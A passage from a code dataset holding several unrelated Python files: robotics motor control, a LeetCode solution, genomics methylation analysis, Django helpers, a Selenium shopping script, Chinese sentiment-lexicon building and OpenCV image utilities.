testing:\n\nenableAll()\ndisableAll()\n\n# Close port\n# portHandler.closePort()\n\nprint(\"Imported MotorControl\")\n","sub_path":"MFRv1/MFRv1_MotorControl.py","file_name":"MFRv1_MotorControl.py","file_ext":"py","file_size_in_byte":11031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"411754009","text":"\n\n#calss header\nclass _INCLEMENT():\n\tdef __init__(self,): \n\t\tself.name = \"INCLEMENT\"\n\t\tself.definitions = [u'Inclement weather is unpleasant, especially with cold wind and rain.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_inclement.py","file_name":"_inclement.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"166467655","text":"#\n# @lc app=leetcode id=378 lang=python3\n#\n# [378] Kth Smallest Element in a Sorted Matrix\n#\n# https://leetcode.com/problems/kth-smallest-element-in-a-sorted-matrix/description/\n#\n# algorithms\n# Medium (50.48%)\n# Total Accepted: 126.3K\n# Total Submissions: 249.8K\n# Testcase Example: '[[1,5,9],[10,11,13],[12,13,15]]\\n8'\n#\n# Given a n x n matrix where each of the rows and columns are sorted in\n# ascending order, find the kth smallest element in the matrix.\n# \n# \n# Note that it is the kth smallest element in the sorted order, not the kth\n# distinct element.\n# \n# \n# Example:\n# \n# matrix = [\n# ⁠ [ 1, 5, 9],\n# ⁠ [10, 11, 13],\n# ⁠ [12, 13, 15]\n# ],\n# k = 8,\n# \n# return 13.\n# \n# \n# \n# Note: \n# You may assume k is always valid, 1 ≤ k ≤ n2.\n#\nimport bisect\nclass Solution:\n # def kthSmallest(self, matrix: List[List[int]], k: int) -> int:\n def kthSmallest(self, matrix, k: int) -> int:\n # print(matrix)\n n = len(matrix[0])\n k -= 1\n # q, r = divmod(k, col_length)\n # print(q, r)\n # return matrix[q][r]\n l = matrix[0]\n for r in range(1,n):\n for i in matrix[r]:\n bisect.insort(l, i)\n # print(l)\n # print(k)\n return l[k]\n\n\n\n# s = Solution()\n# matrix = [\n# [ 1, 5, 9],\n# [10, 11, 13],\n# [12, 13, 15]]\n# k = 8\n# print(s.kthSmallest(matrix, k)) \n\n\n# matrix = [[1,2],[1,3]]\n# k = 2 \n# print(s.kthSmallest(matrix, k)) # 1\n# k = 1 \n# print(s.kthSmallest(matrix, k)) # 1\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python/378.kth-smallest-element-in-a-sorted-matrix.py","file_name":"378.kth-smallest-element-in-a-sorted-matrix.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"602431103","text":"# -*- coding: utf-8 -*-\n\nimport argparse\n\nfrom latent_gan.runners.CreateModelRunner import CreateModelRunner\n\n\ndef main():\n \"\"\"Create a model with the vocabulary extracted from a SMILES file.\"\"\"\n parser = argparse.ArgumentParser(description=\"Create a model with the vocabulary extracted from a SMILES file.\")\n\n parser.add_argument(\"--input-data-path\", \"-i\", help=\"The path to a data file.\", type=str, required=True)\n parser.add_argument(\"--output-model-folder\", \"-o\", help=\"Prefix to the folder to save output model.\", type=str)\n parser.add_argument(\"--latent_dim\", \"-ld\", help=\"dimensionality of the noise\", type=int)\n args = {k: v for k, v in vars(parser.parse_args()).items() if v is not None}\n\n runner = CreateModelRunner(**args)\n runner.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/latent_gan/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"409224445","text":"# -*- coding: utf-8 -*-\n\n# Script inspired from https://github.com/jts/nanopolish/blob/master/scripts/calculate_methylation_frequency.py\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~IMPORTS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n# Standard library imports\nfrom collections import *\nimport csv\nimport datetime\n\n# Third party imports\nfrom tqdm import tqdm\n\n# Local imports\nfrom NanopolishComp.common import *\nfrom NanopolishComp import __version__ as package_version\nfrom NanopolishComp import __name__ as package_name\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~MAIN CLASS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\nclass Freq_meth_calculate():\n\n def __init__ (self,\n input_fn:\"str\",\n output_bed_fn:\"str\"=\"\",\n output_tsv_fn:\"str\"=\"\",\n min_llr:\"float\"=2.5,\n min_depth:\"int\"=10,\n min_meth_freq:\"float\"=0.05,\n verbose:\"bool\"=False,\n quiet:\"bool\"=False):\n \"\"\"\n Calculate methylation frequency at genomic CpG sites from the output of nanopolish call-methylation\n * input_fn\n Path to a nanopolish call_methylation tsv output file\n * output_bed_fn\n Path to write a summary result file in BED format\n * output_tsv_fn\n Path to write an more extensive result report in TSV format\n * min_llr\n Log likelihood ratio threshold\n * min_depth\n Minimal number of reads covering a site to be reported\n * min_meth_freq\n Minimal methylation frequency of a site to be reported\n * verbose\n Increase verbosity\n * quiet\n Reduce verbosity\n \"\"\"\n\n # Save init options in dict for later\n kwargs = locals()\n\n # Define overall verbose level\n self.log = get_logger(name=\"Freq_meth_calculate\", verbose=verbose, quiet=quiet)\n\n # Print option summary log\n self.log.debug (\"## Options summary ##\")\n self.log.debug (\"\\tpackage_name: {}\".format(package_name))\n self.log.debug (\"\\tpackage_version: {}\".format(package_version))\n self.log.debug (\"\\ttimestamp: {}\".format(str(datetime.datetime.now())))\n self.log.debug (dict_to_str(kwargs, nsep=1, exclude_list=[\"self\"]))\n\n # Verify parameters validity\n self.log.warning (\"## Checking arguments ##\")\n\n # Try to read input file if not a stream\n self.log.debug(\"\\tTesting input file readability\")\n if input_fn != 0 and not file_readable (input_fn):\n raise IOError (\"Cannot read input file\")\n\n # Verify that at least one output file is given:\n self.log.debug(\"\\tCheck output file\")\n if not output_bed_fn and not output_tsv_fn:\n raise NanopolishCompError(\"At least one output file should be given\")\n if output_bed_fn:\n mkdir (os.path.dirname(output_bed_fn), exist_ok=True)\n self.log.debug(\"\\t\\tOutput results in bed format\")\n if output_tsv_fn:\n mkdir (os.path.dirname(output_tsv_fn), exist_ok=True)\n self.log.debug(\"\\t\\tOutput results in tsv format\")\n\n # Create self variables\n self.counter = Counter()\n self.input_fn = input_fn\n self.output_bed_fn = output_bed_fn\n self.output_tsv_fn = output_tsv_fn\n self.min_llr = min_llr\n self.min_depth = min_depth\n self.min_meth_freq = min_meth_freq\n\n self.log.warning (\"## Parsing methylation_calls file ##\")\n self._parse_methylation_calls ()\n self.log.info (\"## Results summary ##\")\n self.log.info (dict_to_str(self.counter, nsep=1))\n\n def _parse_methylation_calls(self):\n \"\"\"\"\"\"\n\n # Create collection to store results\n site_dict = defaultdict(list)\n\n try:\n input_fp = open (self.input_fn, \"r\")\n self.log.debug (\"\\tWrite output file header\")\n if self.output_bed_fn:\n output_bed_fp = open (self.output_bed_fn, \"w\")\n output_bed_fp.write(Site.BED_header()+\"\\n\")\n if self.output_tsv_fn:\n output_tsv_fp = open (self.output_tsv_fn, \"w\")\n output_tsv_fp.write(Site.TSV_header()+\"\\n\")\n\n self.log.info (\"\\tStarting to parse file Nanopolish methylation call file\")\n header_line = input_fp.readline()\n byte_offset = len(header_line)\n lp = LineParser(header_line, sep=\"\\t\", cast_numeric_field=True)\n\n for line in input_fp:\n self.counter[\"Total read lines\"]+=1\n byte_len = len(line)\n l = lp(line)\n\n if not l:\n # Failsafe if line is malformed\n self.counter[\"Invalid read line\"]+=1\n else:\n # Store byte offset corresponding to appropriate line\n self.counter[\"Valid read lines\"]+=1\n site_dict[(l.chromosome, l.strand, l.start)].append(byte_offset)\n byte_offset += byte_len\n\n self.log.info (\"\\tProcessing_valid site found\")\n for k, offset_list in site_dict.items():\n self.counter[\"Total sites\"]+=1\n\n # If low coverage unset list to release memory\n if len(offset_list) < self.min_depth:\n self.counter[\"Low coverage sites\"]+=1\n site_dict[k] = []\n\n # If sufficient coverage, process site\n else:\n # Get all read lines corresponding to current site\n ll = []\n for offset in offset_list:\n input_fp.seek(offset, 0)\n ll.append (lp(input_fp.readline()))\n\n # Parse list with helper class Site\n site = Site(ll, self.min_llr)\n if site.meth_freq < self.min_meth_freq:\n self.counter[\"Low methylation sites\"]+=1\n else:\n self.counter[\"Valid sites\"]+=1\n if self.output_bed_fn:\n output_bed_fp.write(site.to_bed()+\"\\n\")\n if self.output_tsv_fn:\n output_tsv_fp.write(site.to_tsv()+\"\\n\")\n finally:\n input_fp.close()\n if self.output_bed_fn:\n output_bed_fp.close()\n if self.output_tsv_fn:\n output_tsv_fp.close()\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~HELPER CLASS~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\n\nclass Site ():\n \"\"\"Structure like class to store site information\"\"\"\n\n # Class id dispatcher\n ID = 0\n @classmethod\n def next_id (cls):\n id = cls.ID\n cls.ID +=1\n return id\n\n @classmethod\n def BED_header (cls):\n return \"track name='nanopolish_methylation' description='Methylation frequency track generated with nanopolish/NanopolishComp' useScore=1\"\n\n @classmethod\n def TSV_header (cls):\n return \"\\t\".join([\"chromosome\",\"start\",\"end\",\"strand\",\"site_id\",\"methylated_reads\",\"unmethylated_reads\",\"ambiguous_reads\",\"sequence\",\"num_motifs\",\"meth_freq\"])\n\n def __init__ (self, ll, min_llr):\n \"\"\"\"\"\"\n self.total = len(ll)\n self.methylated = 0\n self.unmethylated = 0\n self.ambiguous = 0\n self.id = self.next_id()\n self.sequence = ll[0].sequence\n self.num_motifs = ll[0].num_motifs\n self.chromosome = ll[0].chromosome\n self.start = ll[0].start\n self.end = ll[0].end+1\n self.strand = ll[0].strand\n\n for l in ll:\n # Count read methylation call per site\n if l.log_lik_ratio >= min_llr:\n self.methylated+=1\n elif l.log_lik_ratio <= -min_llr:\n self.unmethylated+=1\n else:\n self.ambiguous+=1\n\n self.meth_freq = self.methylated/self.total\n\n def __repr__(self):\n return \"{}:{}-{}({}) / id:{} / reads:{} / meth_freq:{:03}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.strand,\n self.id,\n self.total,\n self.meth_freq)\n\n def to_bed (self):\n \"\"\"\"\"\"\n return \"{}\\t{}\\t{}\\t{}\\t{:06}\\t{}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.id,\n int(self.meth_freq*1000),\n self.strand)\n\n def to_tsv (self):\n \"\"\"\"\"\"\n return \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{:.6f}\".format(\n self.chromosome,\n self.start,\n self.end,\n self.strand,\n self.id,\n self.methylated,\n self.unmethylated,\n self.ambiguous,\n self.sequence,\n self.num_motifs,\n self.meth_freq)\n","sub_path":"NanopolishComp/Freq_meth_calculate.py","file_name":"Freq_meth_calculate.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"547892720","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\n\nimport django\nfrom django.http import HttpResponse\nfrom django.conf import settings\n\nfrom ...common.misc import ResponseBuilder\nfrom .. import CommonStatus\n\nif django.VERSION >= (1, 7): # pragma: nocover\n\n def get_cache(name):\n from django.core.cache import caches\n return caches[name]\nelse:\n from django.core.cache import get_cache # pragma: nocover\n\n\"\"\"\nmisc tools\n\"\"\"\n\n\nclass ResponseContext(ResponseBuilder):\n \"\"\"\n 响应数据构造\n \"\"\"\n def response_json(self, context, ensure_ascii=True, indent=0):\n \"\"\"response json\"\"\"\n response = super(ResponseContext, self).response_json(context, ensure_ascii=True, indent=0)\n response = HttpResponse(response, content_type=\"application/json\")\n if context.get(\"code\", \"\") == CommonStatus.NOT_LOGIN.code:\n response[\"aos-errorcode\"] = CommonStatus.NOT_LOGIN.code\n return response\n\n def response_pb(self, context):\n \"\"\"response protobuffer\"\"\"\n raise NotImplementedError\n\n def __call__(self, request, context=None, statuscode=None, code=None, msg=None, result=None,\n add_response=False):\n \"\"\"\n 构造响应数据\n :param request: django请求对象\n :param context: 响应数据字典 type:dict\n :param statuscode: 错误状态对象\n :param code: 自定义错误码,为空则使用状态对象中的错误码\n :param msg: 错误信息,为空则使用错误对象中的msg\n :param result: 响应结果状态,默认为None,自动判断 type: bool\n :return str 序列化json数据或pb流\n \"\"\"\n response = super(ResponseContext, self).__call__(context, statuscode=statuscode, code=code, msg=msg,\n version=settings.VERSION,\n result=None,\n add_response=add_response)\n\n output = request.parameters.get('output')\n if output == 'pb':\n return self.response_pb(response)\n else:\n return self.response_json(response)\n\n\ndef get_clientip(request, distinct=True):\n \"\"\"\n 获得客户端ip\n :param request:\n :return: clientip or ''\n \"\"\"\n serverip = request.META.get(\"HTTP_NS_CLIENT_IP\") # NAT模式新加的header\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('HTTP_X_FORWARDED_FOR') or ''\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('HTTP_PROXY_CLIENT_IP') or ''\n if not serverip or serverip.lower() == \"unknown\":\n serverip = request.META.get('HTTP_WL_PROXY_CLIENT_IP') or ''\n if not serverip or serverip.lower() == 'unknown':\n serverip = request.META.get('REMOTE_ADDR') or ''\n if serverip and serverip.lower() != \"unknown\":\n if distinct:\n serverip_list = []\n for ip in serverip.split(','):\n ip = ip.strip()\n if ip and ip not in serverip_list:\n serverip_list.append(ip)\n serverip = ','.join(serverip_list)\n return serverip\n return ''\n\n\ndef smart_config_import(config_path):\n '''根据settings中的ENV_TYPE自动选择导入的相应环境\n\n @config_path -- config文件的__file__值.可能为绝对路径,也可能为相对路径\n '''\n abs_path = os.path.abspath(config_path)\n # 获得BASE_DIR后的path\n module_split = os.path.splitext(abs_path)[0].replace(settings.BASE_DIR + '/', '').split('/')\n env_type = getattr(settings, 'ENV_TYPE', 'dev').lower()\n # 拼接待import的module全点路径\n smart_module_name = '%s.%s.%s' % ('.'.join(module_split[:-1]), env_type, module_split[-1])\n # 去除中间的'.dev'\n smart_module_name = smart_module_name.replace('.dev.', '.')\n return 'from %s import *' % smart_module_name\n","sub_path":"libs/djangos/misc/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"484938945","text":"from selenium import webdriver\r\nimport time\r\ndriver = webdriver.Chrome() # 创建浏览器\r\ndriver.get(\"https://www.suning.com/\") # 打开苏宁网站\r\ndriver.maximize_window() # 屏幕最大化\r\ndriver.find_element_by_xpath(\"//*[@id='searchKeywords']\").send_keys(\"iphone13\") # 输入买的东西\r\ndriver.find_element_by_xpath(\"//*[@id='searchSubmit']\").click() # 点击搜索\r\ndriver.implicitly_wait(2) # 网页隐藏式时间等待2秒\r\ntime.sleep(3) # 等3秒时间反应\r\ndriver.find_element_by_xpath('//*[@id=\"ssdsn_search_pro_baoguang-1-0-1_1_01:0000000000_12314319126\"]/i/img').click() # 选择手机\r\ndriver.implicitly_wait(2) # 网页隐藏式时间等待2秒\r\nhandle = driver.window_handles # 获取所有网页或手柄\r\ndriver.switch_to.window(handle[1]) # 获取第一页网页\r\ndriver.find_element_by_xpath('//*[@id=\"colorItemList\"]/dd/ul/li[11]/a/span').click() # 点击手机内存\r\ndriver.implicitly_wait(2) # 网页隐藏式时间等待2秒\r\nhandle = driver.window_handles # 获取所有网页或手柄\r\ndriver.switch_to.window(handle[1]) # 获取第一页网页\r\ntime.sleep(3) # 等3秒反应\r\ndriver.find_element_by_xpath(\"//*[@id='addCart']\").click() # 点击加入购物车 # 成功加入购物车\r\n","sub_path":"autoweb02/苏宁购物.py","file_name":"苏宁购物.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"201714667","text":"import pandas as pd\nimport random\nimport collections\nfrom gensim.models import word2vec\nimport numpy as np\nimport jieba.posseg as peg\nimport copy\nfrom sklearn. feature_extraction.text import CountVectorizer, TfidfTransformer\n#情感倾向值计算\n\n\n\n#加载进来hownet情感词典以及中文情感词汇本体库情感词典\npath0='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/正面评价词语(中文).txt'\npath1='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/负面评价词语(中文).txt'\npath2='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/正面情感词语(中文).txt'\npath3='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/负面情感词语(中文).txt'\npath4='C:/Users/Administrator/Desktop/data/情感字典/知网Hownet情感词典/程度级别词语(中文).txt'\n\n\npath5='C:/Users/Administrator/Desktop/data/台湾大学NTUSD简体中文情感词典/ntusd-negative.txt'\npath6='C:/Users/Administrator/Desktop/data/台湾大学NTUSD简体中文情感词典/ntusd-positive.txt'\n###台湾大学情感词典\nsentiment_taiwan_dict={}\nwith open(path5,'r',encoding='utf-8') as f:\n for word in f.readlines():\n words=word.lstrip('\\ufeff').rstrip('\\n')\n sentiment_taiwan_dict[words]=2\n f.close()\n \nwith open(path6,'r',encoding='utf-8') as f:\n for word in f.readlines():\n words=word.lstrip('\\ufeff').rstrip('\\n')\n sentiment_taiwan_dict[words]=1\n f.close()\n\n#知网情感词典\ndef getdata0(path):\n data=[]\n with open(path, 'r',encoding ='utf-8') as f:\n for line in f.readlines():\n if line[0].isdigit():\n continue\n else:\n if line != '\\n':\n lines=line.strip().split(' ')\n data.extend(lines)\n f.close()\n data.pop(0)\n return data\ndef getdata(path_list):\n type_list=['正面','负面','正面','负面']\n final_data={}\n for i in range(len(path_list)-1):\n data0=getdata0(path_list[i])\n for word in data0:\n if type_list[i]=='正面':\n jx=1\n elif type_list[i]=='反面':\n jx=2\n final_data[word]=jx\n print('{0}词语加载完毕'.format(type_list[i]))\n data={}\n pp=['程度most','程度very','程度over','程度more','程度shao','程度insufficiently']\n print(pp)\n i=0\n with open (path_list[-1],'r',encoding='utf-8') as f:\n for line in f.readlines():\n if line[0].isdigit():\n print(line[0])\n i+=1\n continue\n if line != '\\n':\n #print(i)\n lines=line.strip().split('\\n')[0]\n #print(lines)\n if lines not in data.keys():\n data[lines]=3\n print('程度副词加载完成')\n f.close()\n data.pop('\\ufeff中文程度级别词语\\t\\t219(个数)')\n final_data=dict(final_data,**data)\n return final_data\n\n\nsentiment_hownet_word=getdata([path0,path1,path2,path3,path4])\nsentiment_two=sentiment_taiwan_dict\nfor word,jx in sentiment_hownet_word.items():\n if word in sentiment_two.keys():\n continue\n sentiment_two[word]=jx\n\n\n#sentiment_dict1=dict(sentiment_taiwan_dict,**sentiment_hownet_word)\n\n\n#处理情感词汇本体情感\npath5='C:/Users/Administrator/Desktop/data/情感词汇本体/情感词汇本体.csv'\ndata_0=pd.read_csv(path5,engine='python')\ndata_0['极性']=data_0['极性'].map({0:0,1:1,2:2,3:3,7:0})\nsentiment_dalian_word=dict(zip(data_0['词语'],data_0['极性']))\n#sentiment_dict=dict(sentiment_dalian_word,**sentiment_dict1)\nsentiment_dict=sentiment_two\nfor word, jx in sentiment_dalian_word.items():\n if word in sentiment_dict.keys():\n continue\n sentiment_dict[word]=jx\n\nprint('总的情感词典有:',len(sentiment_dict))\n\n#进行整合情感词典 data 字典\nf=open('C:/Users/Administrator/Desktop/data/corpus/sentiment_dict_goujian.txt','w',encoding='utf-8')\nf.write(str(sentiment_dict))\nf.close()\n\n\n#对于语料库中的单词寻\npath_neg = 'C:/Users/Administrator/Desktop/data/corpus/train_neg_cup_corpus.txt'\npath_pos = 'C:/Users/Administrator/Desktop/data/corpus/train_pos_cup_corpus.txt'\n\nprint('开始加载语料')\ncorpus_neg=[]\ncorpus_pos=[]\n\ncorpus_word_list={}\nprint(' 加载train neg')\nwith open(path_neg, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n lines = line.lstrip('\\ufeff').rstrip('\\n').split(' ')\n doc = []\n #print(lines)\n for word_flag in lines:\n word, flag = word_flag.split('_')\n #print(word, flag)\n if len(word)>=2:\n if word not in corpus_word_list.keys() :\n corpus_word_list[word] = flag\n doc.append(word)\n #print(doc)\n corpus_neg.append(doc)\n f.close()\nprint(' 加载train pos')\nwith open(path_pos, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n lines = line.lstrip('\\ufeff').rstrip('\\n').split(' ')\n doc = []\n #print(lines)\n for word_flag in lines:\n word, flag = word_flag.split('_')\n #print(word, flag)\n if len(word)>=2:\n if word not in corpus_word_list.keys() :\n corpus_word_list[word] = flag\n doc.append(word)\n #print(doc)\n corpus_pos.append(doc)\n f.close()\n\n\ntrain_text_neg=corpus_neg\ntrain_text_pos=corpus_pos\n\n\nall_text_neg=train_text_neg\nall_text_pos=train_text_pos\n\n\nfcorpus={'正面':all_text_pos,'反面':all_text_neg}\n\n\ncorpus0=corpus_pos+corpus_neg\ncorpus_total=corpus0\n\n\n\nsentence=set()\nfor doc in corpus_total:\n sentence.add(' '.join(doc))\n\nwith open('C:/Users/Administrator/Desktop/data/corpus/corpus_total_1.txt','w',encoding='utf-8') as f:\n for doc in corpus_total:\n f.write(str(doc))\n f.close()\n\n#word2vec 求词向量 以及最相近词汇\nmodel=word2vec.Word2Vec(corpus_total,size=500,window=5,min_count=1,workers=5)\n# vectorizer = CountVectorizer()\n# transformer = TfidfTransformer()\n# tfidf = transformer.fit_transform(vectorizer.fit_transform(sentence))\n# weight_doc=coo_matrix(tfidf.toarray())\n# word_list_c=vectorizer.vocabulary_\n# word_weight=weight_doc.T\nprint('开始对语料库中的词汇构建情感词典信息,同时得到处理之后的corpus')\n\n\n\n\n\ndef get_corpus_sentiment(text_neg,text_pos):\n corpus_neg=text_neg\n corpus_pos=text_pos\n fcorpus={'正面':corpus_pos,'反面':corpus_neg}\n\n#求语料库中词汇的情感标签\n#对于语料库中的词汇求情感词典,若为动词则直接删除掉,若为动名词,人名、地名则直接删除,\n def getcorpussentiment(fcorpus):\n sentiment_corpus_total={}\n corpus=copy.deepcopy(fcorpus)\n word_list = list(sentiment_dict.keys())\n cunzai_word={}\n nocunzai_word={}\n shanchu_word={'正面':[],'反面':[]}\n for typ1 ,cor in fcorpus.items():\n for index_doc,doc in enumerate(cor):\n ui=[]\n for index_word,word in enumerate(doc):\n if word in word_list:\n cunzai_word[word] = typ1\n sentiment_corpus_total[word] = sentiment_dict[word]\n else:\n # print('no',word)\n if corpus_word_list[word]=='t' or corpus_word_list[word]=='ns'\\\n or corpus_word_list[word]=='s' or corpus_word_list[word]=='b'or corpus_word_list[word]=='nt' or \\\n corpus_word_list[word]=='nr' or corpus_word_list[word]=='m' or corpus_word_list[word]=='n':\n ui.append((word, index_doc))\n else:\n nocunzai_word[word] = typ1\n shanchu_word[typ1].append(ui)\n\n for ty1,da in shanchu_word.items():\n for doc in da:\n for word ,index_doc in doc:\n # print('del word')\n # print(doc,word)\n # print(corpus[ty1][index_doc])\n corpus[ty1][index_doc].remove(word)\n print(len(sentiment_corpus_total))\n\n #print('删除之后corpus')\n #print(list(nocunzai_word.keys())[:10])\n print('删除v、nr、ns之后在corpus中有{0}个词汇在sentiment_dict中出现了'.format(len(cunzai_word)))\n print('删除v、nr、ns之后在corpus中有{0}个词汇在sentiment_dict中未出现了'.format(len(nocunzai_word)))\n pp=0\n for word,ty in nocunzai_word.items():\n similar_word_list=model.most_similar(word)\n #print(similar_word)\n flag=0\n #print(word)\n #print(similar_word_list)\n try:\n for similar_word in similar_word_list:\n #print(similar_word)\n if similar_word[0] in sentiment_corpus_total.keys() :\n #print(similar_word[0])\n sentiment_corpus_total[word] = sentiment_corpus_total[similar_word[0]]\n print('word:({0}) 找到similar_word:({1})已有情感信息'.format(word, similar_word[0]))\n flag = 1\n break\n elif similar_word[0] in word_list:\n sentiment_corpus_total[word] = sentiment_dict[word]\n print('word:({0}) 找到similar_word:({1})已有情感信息'.format(word, similar_word[0]))\n flag = 1\n break\n else:\n flag=0\n continue\n #print(ty)\n except Exception as result:\n print(result)\n return sentiment_corpus_total,corpus,shanchu_word\n sentiment_corpus_total,corpus,shanchu_word= getcorpussentiment(fcorpus)\n return sentiment_corpus_total,corpus,shanchu_word\nsentiment_corpus_total,corpus,shanchu_word=get_corpus_sentiment(all_text_neg,all_text_pos)\n\n\n\n\n#得到删除之前的token个数,\nword_list=[]\nfor doc in corpus_total:\n for word in doc:\n if word not in word_list:\n word_list.append(word)\nword_list1=[]\nfor i,corpus0 in corpus.items():\n for doc in corpus0:\n for word in doc:\n if word not in word_list1:\n word_list1.append(word)\n\n\n#将删除的词汇导出来\n##shanchu_word_list=shanchu_word['正面']+shanchu_word['反面']\n##f=open('C:/Users/Administrator/Desktop/data/corpus/shanchu_word_list.txt','w',encoding='utf-8')\n##f.write(shanchu_word_list)\n##f.close()\nprint('删除之前的个数:{0}'.format(len(word_list)))\nprint('删除之后的个数:{0}'.format(len(word_list1)))\n\nf=open('C:/Users/Administrator/Desktop/data/corpus/sentiment_corpus_train_3.txt','w',encoding='utf-8')\nf.write(str(sentiment_corpus_total))\nf.close()\n\nf=open('C:/Users/Administrator/Desktop/data/corpus/handle_corpus_train_3.txt','w',encoding='utf-8')\nf.write(str(corpus))\nf.close()\n\n\n","sub_path":"论文/get_sentiment_dict.py","file_name":"get_sentiment_dict.py","file_ext":"py","file_size_in_byte":11106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"243192902","text":"\nimport cv2\nimport numpy\n\nfrom menpo.shape.pointcloud import bounding_box\n\n'''\nDisplay menpo image with optional keypoints\n\n\\param[in] i_img 3 or 1 channel image\n\\param[in] i_pts Column of 2D keypoints\n'''\ndef DisplayMenpoImage(i_img, i_wait = 0, i_pts = None):\n\n i_img = GreyscaleConversionOpenCV(i_img)\n\n img = i_img.pixels[0].copy()\n\n # If no keypoints provided, only display image\n if i_pts is not None: \n for pt in i_pts:\n pt = pt.astype(int)\n cv2.circle(img, (pt[1], pt[0]), 2, 255, 0) \n\n cv2.namedWindow('image')\n cv2.imshow('image',img)\n cv2.waitKey(i_wait)\n\n'''\nDisplay openCV image with optional keypoints\n\n\\param[in] i_img 3 or 1 channel image\n\\param[in] i_pts Column of 2D keypoints\n'''\ndef DisplayOpenCVImage(i_img, i_wait = 0, i_pts = None):\n\n # If no keypoints provided, only display image\n if i_pts is not None: \n for pt in i_pts:\n pt = pt.astype(int)\n cv2.circle(i_img, (pt[1], pt[0]), 2, (255, 255, 255), 0) \n\n cv2.namedWindow('image')\n cv2.imshow('image',i_img)\n cv2.waitKey(i_wait)\n\n'''\nDisplay image with roi overlay\n\n\\param[in] i_img Input image\n\\param[in] i_faces Array of rect rois [ [roi1] [roi2] ... [roi]\n'''\ndef DisplayRects(i_img, i_rois, i_wait = 0):\n\n img = i_img.copy()\n\n for roi in i_rois:\n\n top_left = (roi[0], roi[1])\n bottom_right = (roi[0] + roi[2], roi[1] + roi[3])\n cv2.rectangle(img, top_left, bottom_right, (255, 0,0), 4)\n\n cv2.namedWindow(\"ROIs\")\n cv2.imshow(\"ROIs\", img)\n cv2.waitKey(i_wait)\n\n\n'''\nConvert openCV Rect to Menpo bounding box\n\n\\param[in] i_rois Array of rects\n\n\\return Array of menpo bounding boxes with same ordering as input array\n'''\ndef ConvertRectToMenpoBoundingBox(i_rois):\n\n bbs = []\n for roi in i_rois:\n top_left = (roi[0], roi[1])\n bottom_right = (roi[0] + roi[2], roi[1] + roi[3])\n bbs.append( bounding_box( top_left, bottom_right ) )\n\n return bbs\n\n'''\nReturn largest ROI in list of rois\n\n\\param[in] i_rois list of rois\n\\return largest roi in list\n'''\ndef GetLargestROI(i_rois):\n\n area = i_rois[:,2] * i_rois[:,3]\n return i_rois[area.argmax(axis=0)]\n\n'''\nGreyscale conversion for menpo image\n\n\\param[in] i_img Menpo image\n\\return Greyscale image\n'''\ndef GreyscaleConversionMenpo(i_img):\n\n if i_img.n_channels == 3:\n i_img = i_img.as_greyscale(mode='luminosity')\n\n return i_img\n\n'''\nGreyscale conversion for openCV mat\n\n\\param[in] i_img OpenCV image\n\\return Greyscale image\n'''\ndef GreyscaleConversionOpenCV(i_img):\n\n if len(i_img.shape) == 3:\n i_img = cv2.cvtColor(i_img, cv2.COLOR_BGR2GRAY)\n\n return i_img\n\n","sub_path":"Python/UtilsImgProc.py","file_name":"UtilsImgProc.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"442623275","text":"from __future__ import (absolute_import, division, print_function)\nimport mslice.plotting.pyplot as plt\nfrom mslice.models.workspacemanager.workspace_algorithms import get_comment\nfrom mslice.models.labels import get_display_name, CUT_INTENSITY_LABEL\nfrom mslice.plotting.globalfiguremanager import GlobalFigureManager\n\nPICKER_TOL_PTS = 3\n\n\ndef draw_interactive_cut(workspace):\n cur_fig = plt.gcf()\n cur_canvas = cur_fig.canvas\n ax = plt.gca()\n\n # disconnect picking in interactive cut\n cur_canvas.manager.picking_connected(False)\n cur_canvas.manager.button_pressed_connected(False)\n\n if not cur_canvas.manager.has_plot_handler():\n cur_canvas.restore_region(cur_canvas.manager.get_cut_background())\n _create_cut(workspace)\n try:\n children = 